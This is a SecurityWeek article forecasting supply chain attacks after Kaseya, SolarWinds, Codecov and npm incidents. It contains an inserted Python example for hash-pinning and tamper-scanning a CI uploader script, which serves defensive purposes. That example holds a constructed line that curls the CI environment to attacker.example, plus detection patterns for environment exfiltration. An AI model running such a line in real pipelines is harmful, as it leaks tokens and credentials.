Think of a supply chain attack as hub and spokes. It’s a one-to-many relationship: compromise one and get the rest for free. That one-to-many leverage is the key attraction of supply chain attacks. This is not a new idea, but it’s been taken to new levels of sophistication and frequency in recent years, and the growth will continue through 2022 and beyond.
Mike Sentonas, CTO at CrowdStrike, comments, “Frankly put, supply chains are vulnerable, and adversaries are actively researching ways to take advantage of this. We haven’t nearly seen the end of these attacks, and the implications for each one are significant for both the victims and the victims’ customers and partners up and down the chain.”
Supply chains are attractive targets for both cybercriminal gangs and nation-state actors. For the former, they provide the potential for large-scale extortion attacks (see Cyber Insights 2022: Ransomware), while for the latter they can provide extensive access to espionage-linked targets (see Cyber Insights 2022: Nation-States). Both were illustrated in 2021.
IT management software firm Kaseya was breached by the now-dismantled REvil ransomware gang, leading to the compromise of managed service provider customers and further compromises of their own customers.
Kaseya’s remote monitoring and management package, Virtual System Administrator (VSA), was accessed on customers’ on-premises servers via an authentication bypass vulnerability, and the product’s own software distribution path was then used to push ransomware to the endpoints it managed. Within days of the compromise being discovered, Kaseya announced that between 800 and 1,500 downstream customers had been affected by the attack.
A major supply chain attack by nation state actors was illustrated by the SolarWinds incident. Although the initial breach at SolarWinds occurred in 2019, it wasn’t disclosed until late 2020, and the typical low and slow operation of nation state actors meant the full effects weren’t known or discovered until 2021.
The SolarWinds perpetrator is believed to be APT29 (aka Cozy Bear), linked to the Russian Foreign Intelligence Service (SVR). SolarWinds reported that up to 18,000 customers may have installed the trojanized update to its Orion platform. Of these, it is thought that the attackers followed up on just a few hundred organizations (including government agencies and cybersecurity firms).
These two incidents illustrate the attraction and extent of supply chain attacks and suggest that we will see more of the same in 2022 and beyond.
Pandemic disruption will lead to supply chain attacks
The global effect of the Covid-19 pandemic will play out in supply chain attacks during 2022. The initial switch to remote working, and more lately to hybrid office/home working, has expanded the attack surface for all organizations. Larger companies have the resources to cope with this – for example, by issuing company-owned and controlled devices.
Smaller companies often cannot or do not do this. Smaller companies are consequently at a disproportionately greater risk from compromise via remote workers – but smaller companies are often part of the supply chain of larger corporations. “Cybercriminals,” warns Guido Grillenmeier, chief technologist at Semperis, “will continue to find easy ways into an organization by attacking a smaller or newer company higher up the supply chain that hasn’t got strong cyber defenses in place. There is no doubt that we will see more supply chain attacks in the new year.”
Ryan Sydlik, a security engineer at Telos, has a similar view of both cause and effect for 2022. “Covid-19, and more specifically its aftermath,” he said, “is affecting supply chains. Recovery from the virus is uneven globally, resulting in unbalanced supply and demand between nations. Expect cyberattacks on the supply chain to take an already backed-up situation and make it worse on already stressed supply chains.”
Like Grillenmeier, he expects the less well-protected smaller firm to be a key entry point. “In addition to large corporations involved in global trade, small and medium players in the supply chain will be targeted in 2022 as adversaries recognize that these entities are the most vulnerable choke points and have less robust security. A well targeted outage at the right place and time could disrupt entire industries.”
More specifically, James Carder, CSO and VP at LogRhythm Labs, believes that Covid-19 vaccine manufacturers will be targeted. “In 2022, cybercriminals will set their sights on carrying out a ransomware attack against one of the pharmaceutical companies producing the COVID-19 vaccine. This will interrupt the production of critical booster shots and keep many other lifesaving drugs from reaching patients. The resulting fallout will fan the flame for foreign and domestic vaccine disinformation campaigns.” The pharmaceutical supply chain is a prime target for compromising the vaccine manufacturer.
The current global chip shortage is also partly fanned by the pandemic. The surge in remote working and remote learning has created a heavy demand on chip-using consumer electronics. At the same time, chip fabrication suffered from the various lockdowns – demand heavily exceeded supply. This is expected to continue throughout 2022.
Carder expects criminals to use the supply chain to take advantage of the situation. “A leading country producing semiconductor chips will have its supply-chain compromised, resulting in major shortages of critical materials,” he suggests.
“As countries seek to ramp up production,” he continued, “one country will be caught attempting to corner the market by using fraudulent methods to gain access to the production and supply of the leading chip-producing countries. This will result in shortages of critical supplies, as well as soaring prices for basic goods.”
Software supply chain
Software will continue to be a primary supply chain target throughout 2022 and beyond. The most common approach so far is to compromise a software vendor’s delivery channel so that the malicious payload reaches customers as a trusted download or update. SolarWinds and Kaseya both fit this pattern, though by different routes: at SolarWinds the attackers inserted their code into the vendor’s own build, while at Kaseya they exploited the VSA product and used its distribution path to push ransomware to managed endpoints.
However, a third supply chain attack in 2021 gives us a glimpse of potential future supply chain attacks – this time against open-source software (OSS) rather than application providers. “Our digital economy runs on open-source software (OSS),” explains Lavi Lazarovitz, head of research at CyberArk Labs. “It’s flexible, scalable and harnesses collective community power to spark new innovations. But countless ‘open’ and ‘free’ OSS libraries also mean a dramatically expanded attack surface and a way for threat actors to automate their efforts, sidestep detection and do more harm.”
From January 31, 2021, until the tampering was discovered on April 1, 2021, malicious actors had access to and were able to alter the code of Codecov’s Bash Uploader. Because continuous integration (CI) pipelines fetched the uploader fresh on every run, Bash Uploader users automatically executed the compromised script, which sent the pipeline’s environment variables – where tokens, keys and credentials commonly live – to an attacker-controlled server, ultimately allowing the attacker to harvest secrets from companies around the world.
Users rarely audit the OSS they pull in, and a CI pipeline that fetches the latest copy of a script on each run will execute a tampered version without anyone looking at it. “Using this highly evasive infiltration method, attackers can target and steal credentials to reach thousands of organizations across a supply chain in unison,” added Lazarovitz.
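The Codecov incident worked because pipelines executed whatever the download returned. What follows is an added example (not Codecov’s code, and not from the article’s sources) of the two checks a pipeline can apply instead: pin the SHA-256 of a reviewed copy of the helper script and refuse to run anything else, and, when the hash does differ, scan the new copy for the tell-tale pairing of an environment dump with an outbound transfer. The script bodies, the hosts coverage.example and attacker.example, and the pinned digest are all constructed for this illustration.

```python
"""Pinned-hash gate and tamper scan for a CI helper script fetched at run time.

Added example; not Codecov's uploader. Every script body and host name below is
constructed for the illustration.
"""
import hashlib
import hmac
import re
from typing import List

# Constructed stand-in for a benign uploader script (not Codecov's real script).
BENIGN_UPLOADER = b"""#!/usr/bin/env bash
set -euo pipefail
report="${1:-coverage.xml}"
curl -sS -X POST --data-binary "@${report}" "https://coverage.example/upload"
"""

# Constructed tampered variant: the same uploader plus one injected line that
# posts the CI environment (tokens, keys, credentials) to an attacker host.
TAMPERED_UPLOADER = BENIGN_UPLOADER + b"""
curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" https://attacker.example/upload/v2 || true
"""


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# The digest a team pins in its pipeline config after reviewing the script once.
PINNED_SHA256 = sha256_hex(BENIGN_UPLOADER)


def verify_pinned(script: bytes, pinned_hex: str) -> bool:
    """True only if the fetched bytes are identical to the reviewed copy."""
    return hmac.compare_digest(sha256_hex(script), pinned_hex)


# A dump of the process environment ...
ENV_DUMP = re.compile(r"\$\(\s*(env|printenv|set)\s*\)|\b(env|printenv)\s*\|")
# ... on the same line as a curl/wget call that sends request data.
EXFIL = re.compile(r"\b(curl|wget)\b[^\n]*(-d|--data|--data-binary|--upload-file|-T)\b")


def scan_for_env_exfil(script: bytes) -> List[str]:
    """Line-based triage: flag lines that both read the environment and transmit it."""
    findings = []
    text = script.decode("utf-8", "replace")
    for lineno, line in enumerate(text.splitlines(), 1):
        if ENV_DUMP.search(line) and EXFIL.search(line):
            findings.append(f"line {lineno}: environment dump sent over the network")
    return findings


def decide(script: bytes, pinned_hex: str) -> str:
    """Gate used by the pipeline: execute only a byte-identical, reviewed script.

    Returns "run" or a "reject: ..." string explaining why the script was refused.
    """
    if verify_pinned(script, pinned_hex):
        return "run"
    findings = scan_for_env_exfil(script)
    detail = "; ".join(findings) if findings else "content differs from reviewed copy"
    return f"reject: hash mismatch ({detail})"


if __name__ == "__main__":
    print("benign  ->", decide(BENIGN_UPLOADER, PINNED_SHA256))
    print("tampered->", decide(TAMPERED_UPLOADER, PINNED_SHA256))
```

Hash pinning is the control that blocks the attack regardless of what the modification looks like; the price is that every legitimate update to the script needs a review and a new pin. The scan is only a triage aid for that review: it is line-based, so a payload split across lines, built with eval, or encoded would need a fuller parser.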
OSS is a huge target for attackers. OSS software libraries are used by countless developers in countless companies, often with little oversight. If the source of the OSS can be compromised, vulnerabilities could be introduced into any application that uses the OSS library.
“In the next 12 months, attackers will continue looking for new ways to compromise open-source libraries,” continues Lazarovitz. “We have seen attackers implementing typosquatting-like attacks by creating code packages that include subtle changes to the packages’ names (such as ‘atlas-client’ rather than ‘atlas_client’). These were actually trojanized versions of the original packages, which implement or download a backdoor or credential-stealing functionality. In another case, an NPM package was trojanized to run cryptomining script and credential theft malware after a developer’s credentials were compromised.”
The NPM attack is typical of what can be expected in the future. In October 2021, GitHub announced that three versions of ‘ua-parser-js’ had been compromised. It’s a popular package, with something like 8 million downloads per week. “Any computer that has this package installed or running should be considered fully compromised,” warned GitHub. “All secrets and keys stored on that computer should be rotated immediately from a different computer.”
The cloud is also a natural target for supply chain attacks. By its nature it is fundamentally a one-to-many structure – and this alone makes it attractive to cybercriminals. In 2022, “A large-scale software supply chain attack will take down a major cloud computing service,” warns Josh Rickard, security solutions architect at Swimlane.
“As organizations add more third-party SaaS and IaaS providers to their technology stack,” he explains, “the impact of cyberattacks on centralized cloud services will have a broader effect. In 2022, we will see cybercriminals take advantage of misconfigured SaaS APIs to exploit private data at an unprecedented scale. This will lead to a large distribution of core software code becoming compromised and impacting thousands of organizations across the globe.”
Supply chain attacks in the future
Any topology that provides a one-to-many relationship should be considered a potential target for supply chain attacks in 2022. While such attacks have occurred for many years, 2021 demonstrated a dramatic increase in both quantity and sophistication – and we can expect them to increase further in 2022.
“Supply chain attacks are not as frequent as others, but they have the potential to cause exponentially more harm,” warns Chris Hall, cloud security researcher at Lacework. “This was evidenced in the 2020 SolarWinds hack and 2021’s Codecov and NPM project attacks. The ‘one-to-many’ opportunity afforded by a successful supply chain compromise makes it an attractive option and worthy of attackers’ time and resources. For this reason, we believe that 2022 will see more attacks against software supply chains by both criminal and nation state actors.”
The unknown quantity is the software bill of materials (SBOM) mandated in Biden’s executive order on Improving the Nation’s Cybersecurity of May 12, 2021. In theory it will provide granular visibility into the individual software components of any application, which is exactly what an organization needs in order to know whether a compromised library or version is present in what it runs. Only time will tell whether that visibility translates into fewer successful attacks on the supply chain.
About SecurityWeek Cyber Insights 2022
Cyber Insights 2022 is a series of articles examining the potential evolution of threats over the new year and beyond. Six primary threat areas are discussed:
• Improving Criminal Sophistication
Although the subjects have been separated, the attacks will rarely occur in isolation. Nation state and supply chain attacks will often be linked ‒ as will supply chain and ransomware. Adversarial AI will likely be seen primarily in attacks against identity; at least in the short term. And underlying everything is the growing sophistication and professionalism of the cybercriminal.
SecurityWeek spoke with dozens of security experts and received almost a hundred suggestions for the series.